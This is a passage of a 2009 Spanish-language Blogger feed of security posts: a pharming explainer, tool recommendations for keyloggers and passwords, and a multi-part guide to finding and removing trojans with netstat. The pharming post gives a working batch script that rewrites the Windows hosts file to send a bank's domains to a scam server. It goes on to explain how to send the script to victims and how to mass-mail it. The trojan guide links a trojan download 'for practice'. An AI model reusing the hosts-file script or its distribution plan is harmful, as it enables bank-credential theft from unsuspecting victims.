cosas que Probablemente no sabias sobre tu PC'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6059131308934483932</id><published>2009-09-24T12:27:00.000+02:00</published><updated>2009-09-24T12:43:35.987+02:00</updated><title type='text'>¿Que es pharming ?</title><content type='html'>hola ostraigo esto para que sepais que es el pharming.&lt;br /&gt;&lt;br /&gt;Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio.&lt;br /&gt;&lt;br /&gt;fuente wikipededia&lt;br /&gt;&lt;br /&gt;Ahora que sabemos esto como funciona:&lt;br /&gt;&lt;br /&gt;ejemplo haremos un bat que modifique el hosts,se copia en el bloc de notas&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo 00.000.000.00  http//banco.com  &gt;&gt;%windir%\System32\drivers\etc\hosts&lt;br /&gt;echo 00.000.000.00  www.banco.com  &gt;&gt;%windir%\System32\drivers\etc\hosts&lt;br /&gt;echo 00.000.000.00  banco.com  &gt;&gt;%windir%\System32\drivers\etc\hosts &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.- Donde 00.000.000.00  es donde esta el scam del banco que se quiere entrar &lt;br /&gt;&lt;br /&gt;2.- windir%\System32\drivers\etc\hosts  (ACA ESTA LA RUTA DEL ARCHIVO QUE VA HACER MODIFICADO PARA HACER LAS REDIRECCIONAMIENTOS) &lt;br /&gt;&lt;br /&gt;AHORA LA PREGUNTA DEL MILLON DE DOLARES Y COMO SE LO ENVIO AMI VICTIMA O VICTIMAS&lt;br /&gt;&lt;br /&gt;3.- Una vez creado se compila y se manda a la victima ,la victima lo abre y cuando el cree que esta en su banco realmente esta redireccionando al host en el cual hay un scam ,lo abrira como si entrase en la web y lo que hara es darle todos los datos&lt;br /&gt;bancarios a la persona que le manda el codigo malicioso.&lt;br /&gt;&lt;br /&gt; PD: PARA HACER ENVIO MASIVOS SOLO  SE NECESITAS TENER EMAIL DE VICTIMAS DE UN DETERMINADO PAIS Y ENVIARLOS A TRAVES DE UN MAILER SUBIDO EN UN HOST DE PAGA PARA ENVIAR UNOS 100.000 A 200,000 ENVIOS AL DIA&lt;br /&gt;&lt;br /&gt;Espro que les halla servido y recordar no descargar nada que desconfieis, o pasarlo antes por novirusthanks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6059131308934483932?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6059131308934483932/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/que-es-pharming.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6059131308934483932'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6059131308934483932'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/que-es-pharming.html' title='¿Que es pharming ?'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-231168382794368339</id><published>2009-09-23T19:23:00.000+02:00</published><updated>2009-09-23T19:26:21.540+02:00</updated><title type='text'>Protégete de keyloggers en Windows con Neo’s SafeKeys</title><content type='html'>Habitualmente estamos expuestos a cientos de amenazas informáticas, y si manejamos contraseñas, claves, somos vulnerables a cualquier keylogger , que no es más que un programa que registra en un archivo de texto las teclas pulsadas en nuestro sistema.&lt;br /&gt;&lt;br /&gt;Por supuesto que existen muchos métodos para protegernos de estos programas que son tan peligrosos. Una de las maneras es usando un teclado virtual, y es eso lo que es Neo’s SafeKeys, un teclado virtual para Windows con el cual aumentarás tu privacidad.&lt;br /&gt;&lt;br /&gt;El funcionamiento de Neo’s SafeKeys es sencillo. Una vez que lo hayamos ejecutado (por cierto, es portátil, no requiere de instalación), anotamos la contraseña que como se ve, está también protegida con asteriscos. Luego podremos arrastrar dicha contraseña al formulario o campo de texto en el que queremos ingresar dicho dato privado.&lt;br /&gt;&lt;br /&gt;descargar: http://www.aplin.com.au/?page_id=246&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-231168382794368339?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/231168382794368339/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/protegete-de-keyloggers-en-windows-con.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/231168382794368339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/231168382794368339'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/protegete-de-keyloggers-en-windows-con.html' title='Protégete de keyloggers en Windows con Neo’s SafeKeys'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-308814070583709745</id><published>2009-09-23T19:16:00.000+02:00</published><updated>2009-09-23T19:20:42.464+02:00</updated><title type='text'>PassPub, Generador de Contraseñas Seguras</title><content type='html'>hola hoy os traigo un sofware bastante bueno como su nombre dice genera contraseñas seguras.&lt;br /&gt;Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea de recuperar este por métodos como fuerza bruta, obviamente este tipo de contraseñas es mucho mas difícil de recordar que “micontrasena1″ pero es mucho mas seguro (ademas para administrar nuestras contraseñas tenemos Myvidoop)&lt;br /&gt;&lt;br /&gt;PassPub nos permite generar contraseñas de 64, 128 o 256bits para redes inalambricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, convinaciones basadas en la tabla periodica y otras convinaciones.&lt;br /&gt;&lt;br /&gt;descargar en https://passpub.com/&lt;br /&gt;&lt;br /&gt;fuente:  dragonjar&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-308814070583709745?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/308814070583709745/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/passpub-generador-de-contrasenas.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/308814070583709745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/308814070583709745'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/passpub-generador-de-contrasenas.html' title='PassPub, Generador de Contraseñas Seguras'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-3370868819716317672</id><published>2009-09-22T12:14:00.000+02:00</published><updated>2009-09-22T12:16:37.397+02:00</updated><title type='text'>¿como librarse de un troyano?(tercera parte)</title><content type='html'>Lo cual significa que tenemos procesos en nuestro ordenador que están esperando conección en los puertos: 6711, 6776, 30100, 30101, 30102, 1234, y 1035.&lt;br /&gt;f) Comenzamos a matar, uno por uno, los procesos que no sabemos que función cumplen. Si matamos alguno que no debíamos, y el ordenador se bloquea, ya sabemos para la próxima vez que ese proceso no es un troyano, y que no hay que matarlo&lt;br /&gt;Ejemplo: decido matar al proceso llamado:&lt;br /&gt;C:\WINDOWS\SYSTEM\NSSX.EXE &lt;br /&gt;que es muy sospechoso...&lt;br /&gt;Acto seguido, volvemos a la ventana de DOS y pedimos otro listado de "Netstat -a", que nos devuelve lo siguiente:&lt;br /&gt;Proto Dirección local Dirección remota Estado&lt;br /&gt;TCP Donatien:6711 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:6776 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:1243 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:1035 0.0.0.0:0 LISTENING&lt;br /&gt;UDP Donatien:1035 *:* &lt;br /&gt;Por suspuesto!!! Se han cerrado tres puertos!! (30100, 30101 y 30102, que ya no aparecen en el listado) Al estar seguros que NSSX.EXE no pertenece a ningún programa que nosotros hayamos instalado, y de que el sistema continúa ejecutándose sin ningún problema (o sea que no era parte del Windows), podemos cambiarle el nombre al archivo para que no se vuelva a ejecutar la próxima vez que reiniciemos. Para eso usamos el comando "RENAME C:\WINDOWS\SYSTEM\NSSX.EXE C:\WINDOWS\SYSTEM\NSSX.EX_".&lt;br /&gt;Nótese que tán solo le cambiamos la extensión, para, en caso de habernos equivocado, recuperar el archivo fácilmente.&lt;br /&gt;Podemos renombrar al archivo debido a que ya lo matamos. Si el proceso estuviera ejecutándose no podríamos modificar ni borrar el NSSX.EXE&lt;br /&gt;Otro modo de cambiarle el nombre es ir con el Explorador hasta el directorio C:\WINDOWS\SYSTEM, buscar el archivo NSSX.EXE y situados sobre él presionar F2, escribir el nuevo nombre y .&lt;br /&gt;Ahora, aunque no es del todo indispensable, y no es recomendable para los novatos absolutos, podríamos abrir el registro de windows con el REGEDIT y eliminar la entrada que antes ejecutaba el troyano cada vez que encendíamos la máquina. La entrada está dentro de la rama: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run y es la siguiente: "NSSX" y su valor es "C:\WINDOWS\system\nssx.exe"&lt;br /&gt;Para borrarla basta con marcarla con el mouse, pulsar DEL, y confirmar.&lt;br /&gt;Es importante no andar borrando cualquier cosa del registro. Para aprender más sobre qué es el registro y qué programas ejecuta Windows al arrancar, lean la emisión Nro. 16 de esta misma revista en http://dzone.findhere.com . Allí también aprenderán que la rama del registro "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" no es el unico lugar en el cual un troyano puede asegurarse el ser ejecutado en cada sesión.&lt;br /&gt;El caso de este ejemplo se trataba del famoso NetSphere, un troyano bastante nuevo, que se puede descargar de http://angelfire.com/ar/NetSphere/index2.html . Pueden usarlo para practicar, pero por favor, no sean "Lamers", no lo usen con otras personas, porque dejarían sus máquinas a merced de cualquiera, y si lo usan con ustedes mismos, tengan en cuenta de que no deben conectarse a Internet mientras tengan el troyano instalado. (justamente, para evitar eso es que explico todo esto).&lt;br /&gt;Sigamos con otro ejemplo, sabemos que la lista del "Netstat -a" es ahora más corta:&lt;br /&gt;&lt;br /&gt;Proto Dirección local Dirección remota Estado&lt;br /&gt;TCP Donatien:6711 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:6776 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:1243 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:1035 0.0.0.0:0 LISTENING&lt;br /&gt;UDP Donatien:1035 *:* &lt;br /&gt;Pues bien, ahora procedamos a cerrar el proceso: C:\WINDOWS\WINDOW.EXE &lt;br /&gt;El sistema sigue perfectamente estable, y volvemos a pedir el "Netstat -a" y...&lt;br /&gt;Proto Dirección local Dirección remota Estado&lt;br /&gt;TCP Donatien:1035 0.0.0.0:0 LISTENING&lt;br /&gt;UDP Donatien:1035 *:* &lt;br /&gt;Ohhhhh!! Se han cerrado otros tres puertos! (aclaro que un troyano no necesariamente utiliza 3 puertos, puede utilizar más, o menos).&lt;br /&gt;Próximo paso: renombramos el archivo para que no vuelva a ejecutarse nunca más, vamos a la ventana de DOS, y escribimos: "RENAME C:\WINDOWS\WINDOW.EXE C:\WINDOWS\WINDOW.EX_" &lt;br /&gt;Como ya dije, también podemos eliminar la entrada del registro que lo ejecuta, pero como, habiendo renombrado el archivo, ya no es necesario, lo dejo librado al lector.&lt;br /&gt;Como en mi caso, por experiencia, sé que el puerto 1035 no se trata de un troyano, no voy a continuar matando procesos, pero si tuviera más puertos abiertos, (en el ejemplo que dí al principio había cuatro troyanos y no dos) continuaría haciendolo hasta encontrarlos todos.&lt;br /&gt;Quiero aclarar que no es muy comun que un ordenador esté lleno de troyanos como en estos ejemplos, pero si notan que alguien está molestándolos de un modo extraño cuando entran a Internet, intenten con esta "limpieza".&lt;br /&gt;Otra aclaración: Si matan procesos que no son troyanos NO HAY PROBLEMA, lo peor que puede ocurrir es que tengan que reiniciar la máquina. Sólo asegurense de no tener archivos sin grabar (como un documento de Word) para no perderlo, al momento de estar haciendo estas comprobaciones.&lt;br /&gt;También cabe aclarar que, aunque yo no conozco ninguno, pueden existir troyanos más "inteligentes", que no tengan puertos abiertos cuando no estamos conectados, a esos hay que detectarlos por un método diferente, o bien, intentar hacerlo mientras estamos conectados a Internet (aunque en ese caso la cosa se complicaría debido a los demás programas que utilizan Internet -como el ICQ- y abren a su vez sus propios puertos, con lo cual la lista se hace más difícil de interpretar).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-3370868819716317672?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/3370868819716317672/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-librarse-de-un-troyanotercera.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3370868819716317672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3370868819716317672'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-librarse-de-un-troyanotercera.html' title='¿como librarse de un troyano?(tercera parte)'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-9218920275536789618</id><published>2009-09-21T16:43:00.000+02:00</published><updated>2009-09-21T16:46:40.022+02:00</updated><title type='text'>Como librarse de un troyano?(segunda  parte)</title><content type='html'>Si tenemos en cuenta que es muy dificil que un troyano se instale en otro lado que no sea los directorios WINDOWS o SYSTEM, ya descartamos tres posibilidades (las tres últimas, pero es más seguro descartarlas cuando conocemos la función de cada una de ellas), veamos:&lt;br /&gt;C:\ARCHIVOS DE PROGRAMA\ICQ\ICQ.EXE &lt;br /&gt;es ni más ni menos que el ICQ, si lo matamos, se nos cierra el ICQ.&lt;br /&gt;C:\ARCHIVOS DE PROGRAMA\OUTLOOK EXPRESS\MSIMN.EXE &lt;br /&gt;se trata, como se podrán imaginar, del Outlook Express.&lt;br /&gt;C:\ARCHIVOS DE PROGRAMA\MATAPROCESOS\MATAPROCESOS.EXE &lt;br /&gt;este es tanto o más obvio que los anteriores, nosotros mismos acabamos de ejecutarlo.&lt;br /&gt;También hay que conocer otros procesos comunes de Windows, ¿y cómo lo hacemos? si se trata de algunos de los que ya nombré, yo mismo voy a presentarselos, pero si son otros que no se mustran aquí, probablemente con el método de "prueba y error".&lt;br /&gt;Veamos:&lt;br /&gt;C:\WINDOWS\SYSTEM\KERNEL32.DLL &lt;br /&gt;Este es el "corazón" del Windows, si lo cerramos, tendremos que reiniciar.&lt;br /&gt;C:\WINDOWS\SYSTEM\MSGSVR32.EXE &lt;br /&gt;Este es una utilidad interna, si la cerramos el sistema probablemente pierda estabilidad.&lt;br /&gt;C:\WINDOWS\SYSTEM\mmtask.tsk &lt;br /&gt;Cerrar este es imposible. Siempre vuelve a aparecer. Tiene que ver con las tareas multimedia que el Windows realiza.&lt;br /&gt;C:\WINDOWS\EXPLORER.EXE &lt;br /&gt;Se trata del explorador. Gestiona tanto al Internet Explorer como al Windows Explorer. También gestiona la barra de tareas. Si lo cerramos se nos cierran estas tres cosas. (Generalmente se vuelve a ejecutar automáticamente)&lt;br /&gt;C:\WINDOWS\TASKMON.EXE &lt;br /&gt;Es el monitor de tareas de Windows. Si lo cerramos aparentemente no ocurre nada, pero no recomiendo cerrar procesos sin saber exactamente qué función cumplen, a menos que no nos moleste vernos obligados a reiniciar...&lt;br /&gt;C:\WINDOWS\SYSTEM\SYSTRAY.EXE &lt;br /&gt;Es el "parlantito" (la bocinita) que aparece en la barra de tareas, el programa que nos dá el control del volumen de sonidos de Windows. Si lo cerramos, el parlante (la bocina) desaparece.&lt;br /&gt;C:\WINDOWS\RNAAPP.EXE C:\WINDOWS\TAPISVR.EXE &lt;br /&gt;Estos dos son los que se ejecutaron cuando nos conectamos a Internet. Si los cerramos la conexión se corta y no podremos volver a conectarnos hasta reiniciar la computadora.&lt;br /&gt;&lt;br /&gt;Pues bien, ¿qué nos queda?&lt;br /&gt;C:\WINDOWS\PATCH.EXE C:\WINDOWS\WINDOW.EXE C:\WINDOWS\SYSTEM\ .EXE C:\WINDOWS\SYSTEM\NSSX.EXE &lt;br /&gt;¡Ja! se trata ni más ni menos que de ¡cuatro troyanos! Toda una exageración... Nuestra seguridad (la de nuestros archivos) se ve totalmente violada por culpa de cada uno de estos procesos... ¿Cómo podemos estar seguros de que se trata de troyanos? Eso lo explico en el apartado que viene, pero en el caso de estos cuatro, basta con decir que ya son tán famosos que no hace falta hacer las comprobaciones...&lt;br /&gt;C:\WINDOWS\PATCH.EXE &lt;br /&gt;es el maldito patch del NETBUS&lt;br /&gt;C:\WINDOWS\SYSTEM\ .EXE &lt;br /&gt;es el servidor del Back Orifice&lt;br /&gt;C:\WINDOWS\SYSTEM\NSSX.EXE &lt;br /&gt;es el servidor del NetSphere&lt;br /&gt;C:\WINDOWS\WINDOW.EXE &lt;br /&gt;es un troyano, aunque no sé exactamente cuál... (probablemente SubSeven o una versión levemente modificada del NetBus)&lt;br /&gt;Matando a LOS CUATRO podemos continuar navegando tranquilos, ya que el agresor perdió totalmente su poder. PERO CUIDADO, nuestro sistema seguramente fué modificado para que estos programas se ejecuten cada vez que arrancamos, y como el MataProceso no los borra del disco, sino simplemente los erradica de la memoria, no estamos a salvo de que la próxima vez que reiniciemos ¡los troyanos estén nuevamente allí!&lt;br /&gt;Para librarnos de ellos para siempre leamos los siguientes puntos...&lt;br /&gt;Aclaraciones:&lt;br /&gt;Para que el MataProcesos funcione hace falta tener instalados los 'runtimes' de Visual Basic 5. Si no los tenés los podés conseguir en:&lt;br /&gt;ftp://ftp.simtel.net/pub/simtelnet/win95/dll/vb500a.zip&lt;br /&gt;o en el mirror: ftp://ftp.cdrom.com/pub/simtelnet/win95/dll/vb500a.zip &lt;br /&gt;2) Mataprocesos y Netstat, suficiente para erradicar cualquier troyano&lt;br /&gt;Existe una aplicación llamada Netstat, y está ubicada en C:\WINDOWS. Con ella y la ayuda del MataProcesos podemos limpiar nuestra PC de troyanos.&lt;br /&gt;Para hacerlo correctamente hay que seguir los siguientes pasos:&lt;br /&gt;a) Nos desconectamos de Internet &lt;br /&gt;b) Cerramos todas las aplicaciones que utilicen conexiones a Internet, por ejemplo: ICQ - Internet Explorer o Netscape - GetRight - Go!Zilla - Telnet - mIRC - MSChat - Outlook - Outlook Express - etc...&lt;br /&gt;c) Ejecutamos el MataProcesos&lt;br /&gt;d) Ejecutamos una ventana de DOS&lt;br /&gt;e) En la línea de comandos del DOS tecleamos "netstat -a" y tomamos nota de todos los "puertos" que aparecen como "abiertos", estos aparecen en la columna "Dirección local" con el formato: &lt;nombre_de_nuestra_pc&gt;:&lt;puerto&gt;&lt;br /&gt;Por ejemplo, podríamos tener el siguiente listado: &lt;br /&gt;Proto Dirección local Dirección remota Estado&lt;br /&gt;TCP Donatien:6711 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:6776 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:30100 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:30101 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:30102 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:1243 0.0.0.0:0 LISTENING&lt;br /&gt;TCP Donatien:1035 0.0.0.0:0 LISTENING&lt;br /&gt;UDP Donatien:1035 *:* &lt;br /&gt;&lt;br /&gt;fin de la segunda parte&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-9218920275536789618?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/9218920275536789618/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-librarse-de-un-troyanosegunda.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/9218920275536789618'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/9218920275536789618'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-librarse-de-un-troyanosegunda.html' title='Como librarse de un troyano?(segunda  parte)'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-5157129520791935872</id><published>2009-09-18T11:18:00.000+02:00</published><updated>2009-09-18T11:25:30.612+02:00</updated><title type='text'>Como librarse de un troyano?(primera parte)</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="themeData" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:hyphenationzone&gt;21&lt;/w:HyphenationZone&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;ES&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Hyperlink"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Normal (Web)"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception 